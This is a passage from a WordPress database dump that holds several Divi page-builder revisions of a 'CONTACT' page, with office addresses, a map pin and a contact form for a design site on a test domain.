link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>Singapore</h4>\n<p>22 East 41/B Street,<br /> New York, NY 98765, USA</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:info@designagency.com\">infoNY@designagency.com</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Map Section\" _builder_version=\"3.22\"][et_pb_fullwidth_map address=\"B-53/2, Naraina Vihar, New Delhi-110028, India\" _builder_version=\"4.5.2\" _module_preset=\"default\"][et_pb_map_pin title=\"WhatTheHell?\" pin_address=\"B-53/2, Naraina Vihar, New Delhi-110028, India\" _builder_version=\"4.5.2\" _module_preset=\"default\"]<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>[/et_pb_map_pin][/et_pb_fullwidth_map][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_direction=\"bottom\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Get in touch.</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','CONTACT','','inherit','closed','closed','','401-revision-v1','','','2020-08-08 20:13:01','2020-08-08 20:13:01','',401,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/401-revision-v1/',0,'revision','',0),(710,1,'2020-08-08 20:16:03','2020-08-08 20:16:03','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>COntact US</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Section\" _builder_version=\"3.22\" custom_padding=\"50px||50px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" admin_label=\"Contact Area\" _builder_version=\"3.25\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\"]<h4>Delhi</h4>\n<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>\n<p>+91 9315666436</p>\n<p><a href=\"mailto:dhiraj@wthtest1.in8.cdn-alpha.com\">dhiraj@wthtest1.in8.cdn-alpha.com</a></p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Map Section\" _builder_version=\"3.22\"][et_pb_fullwidth_map address=\"B-53/2, Naraina Vihar, New Delhi-110028, India\" _builder_version=\"4.5.2\" _module_preset=\"default\"][et_pb_map_pin title=\"WhatTheHell?\" pin_address=\"B-53/2, Naraina Vihar, New Delhi-110028, India\" _builder_version=\"4.5.2\" _module_preset=\"default\"]<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>[/et_pb_map_pin][/et_pb_fullwidth_map][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_direction=\"bottom\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Get in touch.</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','CONTACT','','inherit','closed','closed','','401-revision-v1','','','2020-08-08 20:16:03','2020-08-08 20:16:03','',401,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/401-revision-v1/',0,'revision','',0),(712,1,'2020-08-08 20:18:38','2020-08-08 20:18:38','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>COntact US</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Section\" _builder_version=\"3.22\" custom_padding=\"50px||50px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" admin_label=\"Contact Area\" _builder_version=\"3.25\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\"]<h4>Delhi</h4>\n<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>\n<p>+91 9315666436</p>\n<p><a href=\"mailto:dhiraj@wthtest1.in8.cdn-alpha.com\">dhiraj@wthtest1.in8.cdn-alpha.com</a></p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\" locked=\"off\"]<h4>Bangalore</h4>\n<p>&nbsp;</p>\n<p><a href=\"mailto:bangalore@wthtest1.in8.cdn-alpha.com\">bangalore@wthtest1.in8.cdn-alpha.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\" locked=\"off\"]<h4>Singapore</h4>\n<p>&nbsp;</p>\n<p><a href=\"mailto:bangalore@wthtest1.in8.cdn-alpha.com\">bangalore@wthtest1.in8.cdn-alpha.com</a></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Map Section\" _builder_version=\"3.22\"][et_pb_fullwidth_map address=\"B-53/2, Naraina Vihar, New Delhi-110028, India\" _builder_version=\"4.5.2\" _module_preset=\"default\"][et_pb_map_pin title=\"WhatTheHell?\" pin_address=\"B-53/2, Naraina Vihar, New Delhi-110028, India\" _builder_version=\"4.5.2\" _module_preset=\"default\"]<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>[/et_pb_map_pin][/et_pb_fullwidth_map][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_direction=\"bottom\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Get in touch.</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','CONTACT','','inherit','closed','closed','','401-revision-v1','','','2020-08-08 20:18:38','2020-08-08 20:18:38','',401,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/401-revision-v1/',0,'revision','',0),(713,1,'2020-08-08 20:19:18','2020-08-08 20:19:18','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" 